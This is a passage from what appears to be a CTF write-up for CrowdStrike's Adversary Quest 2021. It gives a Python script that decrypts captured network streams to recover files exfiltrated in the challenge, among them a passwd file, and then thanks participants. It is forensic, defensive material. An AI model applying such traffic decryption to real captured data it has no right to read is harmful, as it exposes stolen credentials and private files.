#!/usr/bin/env python3

import struct
import io
import os
from Crypto.Cipher import ChaCha20_Poly1305
from Crypto.Protocol.KDF import scrypt
from Crypto.Random import get_random_bytes

KEY = "my_s3cr3t_k3y"

streams = [
    "192.168.122.251.57760-192.168.122.001.01234",
    "192.168.122.251.57762-192.168.122.001.01234",
    "192.168.122.251.57764-192.168.122.001.01234",
]

def decrypt(data, key):
    msg_buf = io.BytesIO(data)
    version = msg_buf.read(1)
    cipher_nonce_len = struct.unpack("B", msg_buf.read(1))[0]
    cipher_nonce = msg_buf.read(cipher_nonce_len)
    key_salt_len = struct.unpack("B", msg_buf.read(1))[0]
    key_salt = msg_buf.read(key_salt_len)
    remaining = msg_buf.read()
    ciphertext = remaining[:-16]
    digest = data[-16:]

    derived_key = scrypt(key, key_salt, 32, 2**14, 8, 1)
    cipher = ChaCha20_Poly1305.new(key=derived_key, nonce=cipher_nonce)

    plaintext = cipher.decrypt_and_verify(ciphertext, digest)

    filename_length = struct.unpack(">I", plaintext[:4])[0]
    filename = plaintext[4:4 + filename_length]
    file_data = plaintext[4 + filename_length:]

    return (filename.decode(), file_data)


for stream in streams:
    with open(stream, "rb") as infile:
        filename, file_data = decrypt(infile.read(), KEY)
        filename = os.path.basename(filename)
        print(f"Decrypted {filename}")
        with open(filename, "wb") as outfile:
            outfile.write(file_data)

As expected, executing the script yields three different files:

$ ./decrypt.py
Decrypted passwd
Decrypted internal.dat
Decrypted network.png

The flag can be found as part of the image file network.png, concluding the PROTECTIVE PENGUIN challenge track.

Final Remarks

This concludes our journey through PROTECTIVE PENGUIN, the third and final challenge track, and the CrowdStrike Intelligence Adversary Quest 2021. We hope you enjoyed the game. Make sure to check out the CATAPULT SPIDER challenges and the SPACE JACKAL challenges as well. If you have any questions, feel free to email us at adversaryquest@crowdstrike.com. (Also note that we are looking for a Sr. Security Researcher to join the team.)
